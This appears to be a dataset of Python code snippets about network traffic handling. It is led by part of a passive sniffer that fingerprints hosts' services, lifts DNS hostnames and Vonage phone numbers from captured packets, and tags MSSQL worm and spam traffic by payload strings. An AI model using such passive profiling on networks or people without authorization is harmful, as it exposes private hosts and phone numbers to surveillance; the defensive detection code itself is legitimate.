True\n\t\t\t\t\tif (dIP == \"224.0.0.251\"):\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/broadcastclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/client\")\n\n\t\t\t\t\t#Extract dns answers like with 53; change elif to if and add 5353 to ports on next if?\n\t\t\t\t\t#At the moment, no; scapy does not appear to parse 5353 as dns.\n\t\t\t\t\t#else:\n\t\t\t\t\t#\tUnhandledPacket(p)\n\t\t\t#FIXME - add check for \"if isinstance(p['DNS'], whatevertype):\there and at all p[] accesses.\n\t\t\telif (sport == \"53\") and (isinstance(p['DNS'], DNS)) and (p['DNS'].qr == 1):\t\t#qr == 1 is a response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t#FIXME - Also report the TLD from one of the query answers to show what it's willing to answer for?\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"dns/server\")\n\t\t\t\t#Now we extract dns answers. 
First, check that there's no dns error:\n\t\t\t\tif (p['DNS'].rcode == 0):\t\t\t#No error\n\t\t\t\t\tDNSBlocks = [ ]\n\t\t\t\t\tCNAMERecs = [ ]\t\t\t\t#We hold onto all cnames until we've processed all PTR's and A's here\n\t\t\t\t\tif (p['DNS'].ancount > 0):\t\t#If we have at least one answer from the answer block, process it\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].an)\n\t\t\t\t\tif (p['DNS'].arcount > 0):\t\t#Likewise for the \"additional\" block\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].ar)\n\t\t\t\t\tfor OneAn in DNSBlocks:\n\t\t\t\t\t\t#Thanks to Philippe Biondi for showing me how to extract additional records.\n\t\t\t\t\t\t#Debug(\"Start dns extract\" + str(p['DNS'].ancount))\n\t\t\t\t\t\t#OneAn = p[DNS].an\n\t\t\t\t\t\t#while OneAn is not NoPayload:\t\t#This doesn't seem to stop at the end of the list; incorrect syntax.\n\t\t\t\t\t\twhile isinstance(OneAn,DNSRR):\t\t#Somewhat equivalent:\twhile not isinstance(an, NoPayload):\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t#print \"Type: \" + str(type(OneAn))\t\t#All of type scapy.DNSRR\n\t\t\t\t\t\t\tif (OneAn.rclass == 1) and (OneAn.type == 1):\t\t#\"IN\" class and \"A\" type answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\t#Check new hostname to see if it's in the list.\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",A\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",A\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"A\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 2):\t\t\t#\"IN\" class and \"NS\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Perhaps later\n\t\t\t\t\t\t\t\t#Like cnames, this is object -> nameserver hostname, so these would need to be queued like cnames until we're done with A's and PTR's.\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 5):\t\t\t#\"IN\" class and \"CNAME\" answer\n\t\t\t\t\t\t\t\tCNAMERecs.append(OneAn)\t\t\t\t\t#Remember the record; we'll process these after the PTR's and A's\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 6):\t\t\t#\"IN\" class and \"SOA\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Not immediately useful, perhaps later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 12):\t\t#\"IN\" class and \"PTR\" type answer\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#For input of '182.111.59.66.in-addr.arpa.' 
:\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rrname.replace(\".in-addr.arpa.\", \"\")\t\t# '182.111.59.66'\n\t\t\t\t\t\t\t\tDNSIPAddr = DNSIPAddr.split('.')\t\t\t\t# ['182', '111', '59', '66']\n\t\t\t\t\t\t\t\tDNSIPAddr.reverse()\t\t\t\t\t\t# ['66', '59', '111', '182']\n\t\t\t\t\t\t\t\tDNSIPAddr = string.join(DNSIPAddr, '.')\t\t\t\t# '66.59.111.182'\n\t\t\t\t\t\t\t\t#Check that we end up with a legal IPv4 address before continuing; we're getting garbage.\n\t\t\t\t\t\t\t\tif (re.search('^[1-9][0-9\\.]*[0-9]$', DNSIPAddr) == None):\n\t\t\t\t\t\t\t\t\tDebug(\"Odd PTR rrname: \" + OneAn.rrname)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tDNSHostname = OneAn.rdata.lower()\n\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",PTR\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",PTR\"])):\n\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"PTR\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 15):\t\t#\"IN\" class and \"MX\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Possibly later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 28):\t\t#\"IN\" class and \"AAAA\" answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata.upper()\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",AAAA\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",AAAA\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"AAAA\", DNSHostname, \"\")\n\n\t\t\t\t\t\t\t#Move to the next DNS object in the \"an\" block\n\t\t\t\t\t\t\tOneAn = OneAn.payload\n\t\t\t\t\tfor OneCNAME in CNAMERecs:\t\t#Now that we have all A/PTR's, go back and turn cname records into pseudo-A's\n\t\t\t\t\t\tif isinstance(OneCNAME,DNSRR):\n\t\t\t\t\t\t\tAlias = OneCNAME.rrname.lower()\n\t\t\t\t\t\t\tExisting = OneCNAME.rdata.lower()\n\t\t\t\t\t\t\tif isFQDN(Alias) and isFQDN(Existing):\n\t\t\t\t\t\t\t\tif HostIPs.has_key(Existing):\n\t\t\t\t\t\t\t\t\tfor OneIP in HostIPs[Existing]:\t\t\t\t#Loop through each of the IPs for the canonical name, and\n\t\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(OneIP + \",CNAME\")) or (not(Alias in DNSRecord[OneIP + \",CNAME\"])):\n\t\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", OneIP, \"CNAME\", Alias, \"\")\t#report them as kind-of A records for the Alias.\n\t\t\t\t\t\t\t\t#If we don't have a A/PTR record for \"Existing\", just ignore it. 
Hopefully we'll get the Existing A/PTR in the next few answers, and will re-ask for the CNAME later, at which point we'll get a full cname record.\n\t\t\t\t\t\t\t\t#else:\n\t\t\t\t\t\t\t\t#\tDebug(\"CNAME \" + Alias + \" -> \" + Existing + \" requested, but no IP's for the latter, skipping.\")\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tDebug(\"One of \" + Alias + \" and \" + Existing + \" isn't an FQDN, skipping cname processing.\")\n\t\t\t\telif (p['DNS'].rcode == 1):\t\t\t#FormErr: server responding to an improperly formatted request\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 2):\t\t\t#ServFail: domain exists, root nameservers list authoritative name servers, but authNS's won't answer queries\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 3):\t\t\t#NXDOMAIN: root nameservers don't have any listing (domain doesn't exist or is on hold)\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 5):\t\t\t#Query refused\n\t\t\t\t\tpass\n\t\t\t\telse:\t#rcode indicates an error\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"53\") and (type(p['DNS']) == DNS) and (p['DNS'].qr == 0):\t#dns query\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"dns/client\")\n\t\t\telif (sport == \"67\") and (dport == \"68\"):\t\t#Bootp/dhcp server talking to client\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"bootpordhcp/server\")\n\t\t\telif (sport == \"68\") and (dport == \"67\"):\t\t#Bootp/dhcp client talking to server\n\t\t\t\tif (sIP != \"0.0.0.0\"):\t\t\t\t#If the client is simply renewing an IP, remember it.\n\t\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"bootpordhcp/client\")\n\t\t\t\t#else:\t\t\t\t\t\t#If you want to record which macs are asking for addresses, do it here.\n\t\t\t\t#\tpass\n\t\t\telif (sport == \"123\") and (dport == \"123\") and (p['NTP'].stratum != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/generic\")\n\t\t\telif (dport == \"123\") and ( (dIP == \"216.115.23.75\") or (dIP == \"216.115.23.76\") or (dIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ntp/vonageclient\")\n\t\t\telif (sport == \"123\") and ( (sIP == \"216.115.23.75\") or (sIP == \"216.115.23.76\") or (sIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/vonageserver\")\n\t\t\telif (dport == \"137\"):\t\t\t#netbios-ns\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (p['Ethernet'].dst.upper() == \"FF:FF:FF:FF:FF:FF\"):\t\t\t#broadcast\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/broadcastclient\")\n\t\t\t\t\telif 
(Payload != None) and (Payload.find('CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA') > -1):\t#wildcard\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/wildcardclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/unicastclient\")\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"500\") and (dport == \"500\") and (p['ISAKMP'].init_cookie != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"isakmp/generic\")\n\t\t\telif (dport == \"512\"):\t\t\t#BIFF\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('@') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"biff/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (dport == \"1026\") or (dport == \"1027\") or (dport == \"1028\") ):\t#winpopup spam client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and ( (Payload.find('Download Registry Update from:') > -1) or (Payload.find('CRITICAL ERROR MESSAGE! - REGISTRY DAMAGED AND CORRUPTED.') > -1) or (Payload.find('Your system registry is corrupted and needs to be cleaned immediately.') > -1) or (Payload.find('CRITICAL SYSTEM ERRORS') > -1) ):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"winpopup/spamclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"1434\"):\t\t#Probable mssql attack\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Qh.dll') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mssql/clientattack\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"1900\") and (dport == \"1900\") and (dIP == \"239.255.255.250\"):\t\t#SSDP\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('NOTIFY') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ssdp/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"3865\") and (dIP == \"255.255.255.255\"):\t\t#XPL, http://wiki.xplproject.org.uk/index.php/Main_Page\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"xpl/client\")\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (dIP == \"216.115.30.28\") or (dIP == \"69.59.227.77\") or (dIP == \"69.59.232.33\") or (dIP == \"69.59.240.84\") ):\t\t#Vonage SIP client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061 SIP/2.0') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tSipMatch = SipPhoneMatch.search(Payload)\n\t\t\t\t\t\tif (SipMatch != None) and (len(SipMatch.groups()) >= 
1):\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client, phone number: \" + SipMatch.group(1))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"sip/vonage_client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"5061\") and (dport == \"5061\") and ( (sIP == \"216.115.30.28\") or (sIP == \"69.59.227.77\") or (sIP == \"69.59.232.33\") or (sIP == \"69.59.240.84\") ):\t#Vonage SIP server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('.vonage.net:5061>') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"sip/vonage_server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"6515\") and (dport == \"6514\") and (dIP == \"255.255.255.255\"):\t\t#mcafee ASaP broadcast, looking for a proxy out. http://www.myasap.de/intl/EN/content/virusscan_asap/faq_new.asp\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('<rumor version=') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"asap/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"9052\") or (sport == \"9053\") or (sport == \"9054\") ) and ( (sIP == \"205.188.146.72\") or (sIP == \"205.188.157.241\") or (sIP == \"205.188.157.242\") or (sIP == \"205.188.157.243\") or (sIP == \"205.188.157.244\") or (sIP == \"64.12.51.145\") or (sIP == \"64.12.51.148\") or (sIP == \"149.174.54.131\") ):\t#Possibly AOL dns response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('dns-01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"aoldns/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27005\") and ( (dport == \"27016\") or (dport == \"27017\") ):\t\t\t\t#Halflife client live game\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27013\") and (dIP == \"207.173.177.12\"):\t\t\t\t#variable payload, so can't (Payload != None) and (Payload.find('Steam.exe') > -1)\t\t\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (sport == \"27013\") and (sIP == \"207.173.177.12\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (sport == \"27016\") or (sport == \"27017\") ) and (dport == \"27005\"):\t\t\t\t#halflife server live game\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"27015\") or (dport == 
\"27016\") or (dport == \"27025\") or (dport == \"27026\") ):\t\t#Variable payload, so can't: (Payload != None) and (Payload.find('basic') > -1)\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\telif (dport == \"27017\") and ( (dIP == \"69.28.148.250\") or (dIP == \"69.28.156.250\") or (dIP == \"72.165.61.161\") or (dIP == \"72.165.61.185\") or (dIP == \"72.165.61.186\") or (dIP == \"72.165.61.188\") or (dIP == \"68.142.64.164\") or (dIP == \"68.142.64.165\") or (dIP == \"68.142.64.166\") ):\t#Steamfriends client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"steamfriends/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27017\") and ( (sIP == \"69.28.148.250\") or (sIP == \"69.28.156.250\") or (sIP == \"72.165.61.161\") or (sIP == \"72.165.61.185\") or (sIP == \"72.165.61.186\") or (sIP == \"72.165.61.188\") or (sIP == \"68.142.64.164\") or (sIP == \"68.142.64.165\") or (sIP == \"68.142.64.166\") ):\t#Steamfriends server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('VS01') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"steamfriends/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (sport == \"21020\") or (sport == \"21250\") or (sport == \"27016\") or (sport == \"27017\") or (sport == \"27018\") or (sport == \"27030\") or (sport == \"27035\") or (sport == \"27040\") or (sport == \"28015\") ):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Team Fortress') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27019\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"1265\") or (dport == \"20100\") or (dport == \"21550\") or (dport == \"27000\") or (dport == \"27017\") or (dport == \"27018\") or (dport == \"27019\") or (dport == \"27022\") or (dport == \"27030\") or (dport == \"27035\") or (dport == \"27050\") or (dport == \"27078\") or (dport == \"27080\") or (dport == \"28015\") or (dport == \"28100\") or (dport == \"45081\") ):\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Source Engine Query') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"24441\"):\t\t\t#Pyzor\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif 
(Payload != None) and (Payload.find('User:') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"pyzor/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t#FIXME - interesting issue; the ttl<5 test will catch traceroutes coming into us, but not ones we're creating to go out. Hmmm.\n\t\t\telif ( (dport >= \"33434\") and (dport <= \"33524\") ) and (p['IP'].ttl <= 5):\t#udptraceroute client\n\t\t\t\tif ((not LiveUDPClient.has_key(sIP + \"UDP_33434\")) or (LiveUDPClient[sIP + \"UDP_33434\"] == False)):\n\t\t\t\t\tLiveUDPClient[sIP + \"UDP_33434\"] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_33434\", \"open\", \"udptraceroute/client\")\n\t\t\telif (dport == \"40348\"):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('HLS') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (p['IP'].frag > 0):\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"207.46.51.74\") or (sIP == \"65.55.251.10\"):\t\t\t\t#Bigfish.com - dns?\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"61.215.106.146\"):\t\t\t\t#junk\n\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tDebug(\"Other IP protocol (\" + str(p['IP'].src) + \"->\" + str(p['IP'].dst) + \"): \" + str(p['IP'].proto))\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x86DD:\t\t#IPv6\n\t\tUnhandledPacket(p)\n\telse:\n\t\tprint \"Unregistered ethernet type:\", p['Ethernet'].type\n\t\tUnhandledPacket(p)", "def _add_pkt_into_tcp_stream(self, pcap_packet, num):\n \n # the src is server, remote(dst) is client\n if (pcap_packet.ip.dst == _device_ip): # HUA use ip (not 80 port) as direction judgement\n server_addr = pcap_packet.ip.src\n server_port = pcap_packet.tcp.src_port\n client_addr = pcap_packet.ip.dst\n client_port = pcap_packet.tcp.dst_port\n else:\n server_addr = pcap_packet.ip.dst\n server_port = pcap_packet.tcp.dst_port\n client_addr = pcap_packet.ip.src\n client_port = pcap_packet.tcp.src_port\n socket_tuple = (client_addr, client_port, server_addr, server_port)\n if (socket_tuple not in self.tcp_stream_container):\n self.tcp_stream_container[socket_tuple] = Tcp_stream()\n pcap_packet.tcp.stream_index = self.tcp_stream_container[socket_tuple].stream_index\n self.tcp_stream_container[socket_tuple].pcap_num_list.append(num)", "def get_route(self, srcip, daddr): #destinations add of this packet\n # TODO fill in peer?\n peer = None\n\n pos_routes = self.lookup_routes(daddr)\n\n #prefix stuff\n\n pos_routes = self.prefix_stuff(daddr, pos_routes) #look through possible\n #and find prefix matching destination ip\n\n # Rules go here\n #if pos_routes:\n # 1. Highest Preference\n #pos_routes = self.get_highest_preference(pos_routes)\n # 2. Self Origin\n # pos_routes = self.get_self_origin(pos_routes)\n # 3. Shortest ASPath\n # pos_routes = self.get_shortest_as_path(pos_routes)\n # 4. EGP > IGP > UNK\n # pos_routes = self.get_origin_routes(pos_routes)\n # 5. 
Lowest IP Address\n\n #daddrbit = self.ip_to_bits(daddr)\n\n # Final check: enforce peering relationships\n\n #route = self.filter_relationships(srcip, pos_routes)\n #lowestip = 0;\n\n\n peer = pos_routes[0]\n\n return self.sockets[peer] if peer else None", "def routePacket(self, packet):\n\n for rule in self._rules:\n # check rule mask vs packet ip\n ip = IPHelper.ipToLong(packet._ip)\n\n if rule._raw_ip == '*' or (rule._ip_mask_val & ip == rule._good_ip):\n if rule._direction == packet._direction:\n for p in rule._ports:\n if p == packet._port or p == '*':\n if rule._flag is None:\n #packet is non-established connection\n return rule\n elif rule._flag == 'established' and packet._flag == '1':\n #packet is established connection and flag has been set for established connection\n return rule\n else:\n pass\n else:\n pass\n else:\n pass\n else:\n pass\n\n return None", "def test_overlap1(self):\n\n fragments = []\n for _, frags_400, frags_300 in self.pkt_infos:\n if len(frags_300) == 1:\n fragments.extend(frags_400)\n else:\n for i, j in zip(frags_300, frags_400):\n fragments.extend(i)\n fragments.extend(j)\n\n dropped_packet_indexes = set(\n index for (index, _, frags) in self.pkt_infos if len(frags) > 1\n )\n\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n\n packets = self.dst_if.get_capture(\n len(self.pkt_infos) - len(dropped_packet_indexes)\n )\n self.verify_capture(packets, dropped_packet_indexes)\n self.src_if.assert_nothing_captured()", "def main(self):\n self.pid = os.getpid()\n self.fdp.close() # Close fdp on child side\n if self.datasock is None:\n # Create session's data socket and load file\n self.datasock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.load_file()\n logging.info(\"Child process finished loading file\")\n port = UDP_START + self.meta.sessionid # Port used by the session\n poller = select.poll() # poll fdc and datasock\n poller.register(self.fdc.fileno(), select.POLLIN)\n poller.register(self.datasock.fileno(), select.POLLOUT)\n pkt_p = snc.snc_alloc_empty_packet(snc.snc_get_parameters(self.sc))\n while True:\n for fd, event in poller.poll():\n if fd == self.fdc.fileno() and event is select.POLLIN:\n pkt, ip = self.fdc.recv()\n logging.info(\"Session [%d] received msg <%s> from %s.\" %\n (self.meta.sessionid, iMSG[pkt.header.mtype], ip))\n if pkt.header.mtype == MSG['REQ_SEG']:\n self.add_client(HostInfo(ip, self.meta.sessionid))\n self.fdc.send(CCPacket(CCHeader(MSG['OK'])))\n elif pkt.header.mtype == MSG['HEARTBEAT']:\n self.client_heartbeat(ip)\n 